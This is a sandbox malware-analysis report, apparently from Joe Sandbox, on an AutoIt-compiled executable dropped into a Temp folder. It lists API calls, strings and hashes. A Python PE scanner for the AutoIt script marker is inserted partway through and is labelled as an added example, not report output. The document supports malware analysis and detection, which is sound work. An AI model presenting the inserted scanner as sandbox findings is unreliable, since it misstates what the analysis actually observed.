                                      • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                      • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98

                                      Control-flow Graph

                                      • Control-flow graph image not captured; node list: 46beb2 entry; 46bf7e RegConnectRegistryW; 46bfc9 RegOpenKeyExW; 46c022, 46c0b8, 46c15b, 46c23e, 46c297 RegQueryValueExW; 46c006, 46c057, 46c30c, 46c321 RegCloseKey
                                      APIs
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BF8D
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ConnectRegistry_memmove_wcslen
                                      • String ID:
                                      • API String ID: 15295421-0
                                      • Opcode ID: 665d78321b16556ab0d3437a6a7b046631928895fae13efc9901a8b94e14fb35
                                      • Instruction ID: 33baa24a15bb30b806ffdc3d4c8c2128b8dbdbb38b4108e5c3e965d5e336c96e
                                      • Opcode Fuzzy Hash: 665d78321b16556ab0d3437a6a7b046631928895fae13efc9901a8b94e14fb35
                                      • Instruction Fuzzy Hash: 89E17471204200ABD714EF69CD85F2BB7E8AF88704F14891EF985DB381D779E941CB9A

                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _malloc
                                      • String ID: Default
                                      • API String ID: 1579825452-753088835
                                      • Opcode ID: fb09f9ae9c6d9d8d146d04252a7228c7bc6bb3d62ba3194af7ee300fb72b492a
                                      • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                      • Opcode Fuzzy Hash: fb09f9ae9c6d9d8d146d04252a7228c7bc6bb3d62ba3194af7ee300fb72b492a
                                      • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                                      Control-flow Graph

                                      • Control-flow graph image not captured; node list: 40f5c0 entry; internal calls only (422240, 413650, 410e60, 414d04, 4150d1, 414d30), no imported API in the graph
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: __fread_nolock_fseek_memmove_strcat
                                      • String ID: AU3!$EA06
                                      • API String ID: 1268643489-2658333250
                                      • Opcode ID: eec17673349e6d1fef762f4766216b85eb19fa57de04761bf77a8f4232215354
                                      • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                      • Opcode Fuzzy Hash: eec17673349e6d1fef762f4766216b85eb19fa57de04761bf77a8f4232215354
                                      • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
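The function above appears to be the AutoIt runtime locating its embedded compiled script: it seeks and reads through its own image (fseek, fread_nolock, memmove, strcat) looking for the script header that the report lists as the two strings "AU3!" and "EA06", i.e. the 8-byte marker AU3!EA06. The scanner below is an added example, not code from the Joe Sandbox report or from the sample, that performs the same check from the outside with a minimal hand-written PE section parser so it runs without third-party modules. It reports where each marker sits: inside a named section (current AutoIt builds keep the script in a resource, so .rsrc is the usual place) or in the overlay appended after the last section. The constructed two-section test image, the .text/.rsrc layout, and the older AU3!EA05 header variant are assumptions made for the example and are not taken from the report.

```python
"""Locate the AutoIt compiled-script marker inside a PE image (added example)."""
import struct
import sys
from dataclasses import dataclass
from typing import List

# "AU3!" + "EA06" are the two strings the report lists for this function; the
# EA05 header of older AutoIt builds is an assumption added here, not from the report.
AU3_MARKERS = (b"AU3!EA06", b"AU3!EA05")


@dataclass
class Section:
    name: str
    raw_ptr: int
    raw_size: int

    def contains(self, offset: int) -> bool:
        return self.raw_ptr <= offset < self.raw_ptr + self.raw_size


@dataclass
class Au3Hit:
    marker: bytes
    offset: int
    location: str  # section name, "overlay" (past the last section) or "headers"


def parse_sections(data: bytes) -> List[Section]:
    """Minimal PE section-table parser; raises ValueError on anything that is not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                          # 20-byte COFF file header
    if len(data) < coff + 20:
        raise ValueError("truncated COFF header")
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + opt_size                 # section table follows the optional header
    sections: List[Section] = []
    for i in range(num_sections):
        entry = data[table + i * 40: table + (i + 1) * 40]
        if len(entry) < 40:
            raise ValueError("truncated section table")
        name = entry[:8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", entry, 16)  # SizeOfRawData, PointerToRawData
        sections.append(Section(name, raw_ptr, raw_size))
    return sections


def overlay_start(sections: List[Section]) -> int:
    """File offset where appended (overlay) data begins: end of the last raw section."""
    return max((s.raw_ptr + s.raw_size for s in sections), default=0)


def find_au3_script(data: bytes) -> List[Au3Hit]:
    """Return every AutoIt script header in the image together with the region it lives in."""
    sections = parse_sections(data)
    ovl = overlay_start(sections)
    hits: List[Au3Hit] = []
    for marker in AU3_MARKERS:
        pos = data.find(marker)
        while pos != -1:
            if pos >= ovl:
                location = "overlay"
            else:
                location = next((s.name for s in sections if s.contains(pos)), "headers")
            hits.append(Au3Hit(marker, pos, location))
            pos = data.find(marker, pos + 1)
    return sorted(hits, key=lambda h: h.offset)


def build_sample_pe() -> bytes:
    """Constructed stand-in for a compiled AutoIt binary (NOT the analysed sample): a two-section
    PE32 carrying one marker inside .rsrc and a second one in the overlay after the last section."""
    opt_size = 0xE0
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)                 # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, opt_size, 0x102)    # i386, two sections

    def section_entry(name: bytes, vaddr: int, raw_ptr: int, raw_size: int) -> bytes:
        return struct.pack("<8sIIIIIIHHI", name, raw_size, vaddr, raw_size, raw_ptr,
                           0, 0, 0, 0, 0x40000040)

    headers = (dos + b"PE\0\0" + coff + b"\0" * opt_size
               + section_entry(b".text", 0x1000, 0x200, 0x200)
               + section_entry(b".rsrc", 0x2000, 0x400, 0x200))
    headers += b"\0" * (0x200 - len(headers))
    text = b"\xCC" * 0x200
    rsrc = b"\0" * 0x10 + AU3_MARKERS[0] + b"<script blob in resource>"
    rsrc += b"\0" * (0x200 - len(rsrc))
    overlay = b"\0" * 8 + AU3_MARKERS[0] + b"<script blob appended as overlay>"
    return headers + text + rsrc + overlay


if __name__ == "__main__":
    image = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe()
    for hit in find_au3_script(image):
        print(f"{hit.marker.decode()} at 0x{hit.offset:X} ({hit.location})")
```

Run it with a file path to scan a real dropped binary such as the AHPOBS.exe this report names; with no argument it scans the constructed image. A marker in the overlay or in .rsrc tells you which AutoIt packaging convention the sample uses and where to carve the script for decompilation; a hit with no marker at all in a file that still shows the AutoIt v3 window class and registry strings is worth a second look, since the script may be obfuscated or loaded from elsewhere.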

                                      Control-flow Graph (rendered graph not reproduced in text; legend: Executed / Not Executed). Function at 0x401100: basic blocks 0x401100-0x401225 with out-of-line blocks at 0x42AFB4-0x42B06D; calls to 0x401250, 0x401000, 0x40E0C0, 0x40F190, 0x401A50, 0x4370F4, 0x45FD57 and 0x468B0E; Win32 API calls DefWindowProcW, KillTimer, PostQuitMessage, SetTimer, RegisterWindowMessageW and CreatePopupMenu.
                                      APIs
                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                      • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                      • PostQuitMessage.USER32(00000000), ref: 004011CB
                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                      • CreatePopupMenu.USER32 ref: 00401204
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                      • String ID: TaskbarCreated
                                      • API String ID: 129472671-2362178303
                                      • Opcode ID: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                      • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                      • Opcode Fuzzy Hash: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                      • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E
                                      APIs
                                        • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                      • _wcslen.LIBCMT ref: 004335F2
                                      • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                      • GetLastError.KERNEL32 ref: 0043362B
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                      • _wcsrchr.LIBCMT ref: 00433666
                                        • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                      • String ID: \
                                      • API String ID: 321622961-2967466578
                                      • Opcode ID: ca3ca64df16dd99c9d1ec9e68faae20544b3f7039bee5a33b03b189014f46b41
                                      • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                      • Opcode Fuzzy Hash: ca3ca64df16dd99c9d1ec9e68faae20544b3f7039bee5a33b03b189014f46b41
                                      • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                      APIs
                                      • _malloc.LIBCMT ref: 004115F1
                                        • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                        • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                        • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                      • std::exception::exception.LIBCMT ref: 00411626
                                      • std::exception::exception.LIBCMT ref: 00411640
                                      • __CxxThrowException@8.LIBCMT ref: 00411651
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                      • String ID: ,*H$4*H$@fI
                                      • API String ID: 615853336-1459471987
                                      • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                      • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                      • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                      • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 0046C96E
                                        • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                        • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Variant$Copy$ClearErrorInitLast
                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                      • API String ID: 3207048006-625585964
                                      • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                      • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                      • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                      • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                      APIs
                                      • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                      • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                      • _wcsncpy.LIBCMT ref: 004102ED
                                      • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                      • _wcsncpy.LIBCMT ref: 00410340
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                      • String ID: C:\Users\user\AppData\Local\Temp\AHPOBS.exe
                                      • API String ID: 3170942423-1987918518
                                      • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                      • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                      • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                      • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                      APIs
                                        • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                        • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                        • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                      • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                      • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                      • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                      • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                      • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                      • String ID:
                                      • API String ID: 3300667738-0
                                      • Opcode ID: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                      • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                      • Opcode Fuzzy Hash: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                      • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                      APIs
                                      • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                      • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: QueryValue$CloseOpen
                                      • String ID: Include$Software\AutoIt v3\AutoIt
                                      • API String ID: 1586453840-614718249
                                      • Opcode ID: 745ef64aa2fbb9668b51d20dc45e3911ec94e57b8678bed3badf0bc954fa3e05
                                      • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                      • Opcode Fuzzy Hash: 745ef64aa2fbb9668b51d20dc45e3911ec94e57b8678bed3badf0bc954fa3e05
                                      • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                      APIs
                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                      • ShowWindow.USER32(?,00000000), ref: 004105E4
                                      • ShowWindow.USER32(?,00000000), ref: 004105EE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Window$CreateShow
                                      • String ID: AutoIt v3$edit
                                      • API String ID: 1584632944-3779509399
                                      • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                      • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                      • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                      • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Variant$Copy$ClearErrorLast
                                      • String ID: NULL Pointer assignment$Not an Object type
                                      • API String ID: 2487901850-572801152
                                      • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                      • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                      • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                      • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                      APIs
                                      • OpenSCManagerW.SECHOST(00000000,00000000,00000008,004A90E8,14000000,0042E252), ref: 00432FF8
                                      • LockServiceDatabase.ADVAPI32(00000000), ref: 00433005
                                      • UnlockServiceDatabase.ADVAPI32(00000000), ref: 00433010
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 00433019
                                      • GetLastError.KERNEL32 ref: 00433024
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 00433034
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
